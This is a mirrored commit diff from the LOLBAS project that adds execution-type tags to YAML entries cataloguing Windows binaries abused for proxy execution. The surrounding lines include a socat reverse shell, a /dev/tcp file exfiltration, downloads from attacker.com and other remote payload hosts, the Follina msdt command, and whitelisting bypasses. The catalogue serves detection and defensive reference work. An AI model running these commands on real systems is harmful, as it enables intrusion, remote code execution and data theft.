public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Adding Execute tags to most LOLBas (#405)

Browse Source
This commit is contained in:
hegusung
2024-12-29 18:31:01 +01:00
committed by GitHub
parent baaa5bbc73
commit b9a6cd6a87
129 changed files with 520 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/Addinutil.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

2
yml/OSBinaries/At.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Local Admin
MitreID: T1053.002
OperatingSystem: Windows 7 or older
Tags:
- Execute: CMD
Full_Path:
- Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe

2
yml/OSBinaries/Atbroker.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\Atbroker.exe
- Path: C:\Windows\SysWOW64\Atbroker.exe

8
yml/OSBinaries/Bash.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@@ -32,6 +38,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe

5
yml/OSBinaries/Cmstp.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Execute: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +21,8 @@ Commands:
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
- Execute: INF
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe

4
yml/OSBinaries/Conhost.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable)
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\conhost.exe
Detection:

9
yml/OSBinaries/Control.yml
View File

@@ -13,6 +13,15 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: control.exe c:\windows\tasks\evil.cpl
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function)
Usecase: Use to execute code and bypass application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe

2
yml/OSBinaries/CustomShellHost.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\CustomShellHost.exe
Detection:

3
yml/OSBinaries/Dfsvc.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: ClickOnce
- Execute: Remote
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe

4
yml/OSBinaries/Diskshadow.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1003.003
OperatingSystem: Windows server
Tags:
- Execute: CMD
- Command: diskshadow> exec calc.exe
Description: Execute commands using diskshadow.exe to spawn child process
Usecase: Use diskshadow to bypass defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows server
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\diskshadow.exe
- Path: C:\Windows\SysWOW64\diskshadow.exe

1
yml/OSBinaries/Dnscmd.yml
View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows server
Tags:
- Execute: DLL
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe

1
yml/OSBinaries/Esentutl.yml
View File

@@ -46,7 +46,6 @@ Commands:
Privileges: Admin
MitreID: T1003.003
OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server
Full_Path:
- Path: C:\Windows\System32\esentutl.exe
- Path: C:\Windows\SysWOW64\esentutl.exe

2
yml/OSBinaries/Eventvwr.yml
View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Execute: .NetObjects
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe

4
yml/OSBinaries/Explorer.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe

4
yml/OSBinaries/Forfiles.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\forfiles.exe
- Path: C:\Windows\SysWOW64\forfiles.exe

2
yml/OSBinaries/Fsutil.yml
View File

@@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\fsutil.exe
- Path: C:\Windows\SysWOW64\fsutil.exe

2
yml/OSBinaries/Ftp.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.

4
yml/OSBinaries/Gpscript.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\gpscript.exe
- Path: C:\Windows\SysWOW64\gpscript.exe

17
yml/OSBinaries/Hh.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe c:\windows\system32\calc.exe
Description: Executes calc.exe with HTML Help.
Usecase: Execute process with HH.exe
@@ -18,6 +21,20 @@ Commands:
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Application: GUI
- Command: HH.exe http://some.url/payload.chm
Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe
Category: Execute
Privileges: User
MitreID: T1218.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CHM
- Execute: Remote
Full_Path:
- Path: C:\Windows\hh.exe
- Path: C:\Windows\SysWOW64\hh.exe

2
yml/OSBinaries/Ie4uinit.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: c:\windows\system32\ie4uinit.exe
- Path: c:\windows\sysWOW64\ie4uinit.exe

2
yml/OSBinaries/Iediagcmd.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files\Internet Explorer\iediagcmd.exe
Detection:

6
yml/OSBinaries/Ieexec.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location
@@ -18,6 +21,9 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Remote
- Execute: EXE (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

2
yml/OSBinaries/Infdefaultinstall.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Admin
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: C:\Windows\System32\Infdefaultinstall.exe
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe

8
yml/OSBinaries/Installutil.yml
View File

@@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
@@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

4
yml/OSBinaries/Jsc.yml
View File

@@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: JScript
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

7
yml/OSBinaries/Microsoft.Workflow.Compiler.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: VB.Net
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@@ -18,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
@@ -25,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:

4
yml/OSBinaries/Mmc.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: COM
- Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe

8
yml/OSBinaries/Msbuild.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL
@@ -35,7 +39,7 @@ Commands:
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: XSL
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
@@ -43,6 +47,8 @@ Commands:
Privileges: User
MitreID: T1036
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe

2
yml/OSBinaries/Msconfig.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\msconfig.exe
Code_Sample:

3
yml/OSBinaries/Msdt.yml
View File

@@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
@@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting
@@ -31,6 +33,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe

2
yml/OSBinaries/Msedge.yml
View File

@@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
Full_Path:
- Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
- Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

9
yml/OSBinaries/Mshta.yml
View File

@@ -12,7 +12,8 @@ Commands:
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Execute: HTA
- Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
@@ -20,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
@@ -27,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
@@ -35,7 +40,7 @@ Commands:
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: WSH
- Execute: HTA
- Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

11
yml/OSBinaries/Msiexec.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
@@ -18,6 +20,9 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll"
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
@@ -27,6 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
@@ -36,6 +42,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@@ -43,6 +50,10 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Execute: MST
- Execute: Remote
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe

5
yml/OSBinaries/Pcalua.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
@@ -20,6 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Execute: Remote
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
@@ -27,6 +30,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Detection:

4
yml/OSBinaries/Pcwrun.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: Pcwrun.exe /../../$(calc).exe
Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Proxy execution of binary
@@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\pcwrun.exe
Detection:

2
yml/OSBinaries/Pnputil.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1547
OperatingSystem: Windows 7, Windows 10, Windows 11
Tags:
- Execute: INF
Full_Path:
- Path: C:\Windows\system32\pnputil.exe
Code_Sample:

2
yml/OSBinaries/Presentationhost.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

2
yml/OSBinaries/Provlaunch.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\provlaunch.exe
Detection:

8
yml/OSBinaries/Regasm.yml
View File

@@ -5,15 +5,14 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
@@ -22,8 +21,7 @@ Commands:
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

10
yml/OSBinaries/Regsvcs.yml
View File

@@ -5,25 +5,23 @@ Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Execute: DLL (.NET)
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

10
yml/OSBinaries/Regsvr32.yml
View File

@@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -18,6 +21,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@@ -25,6 +30,9 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@@ -32,6 +40,8 @@ Commands:
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
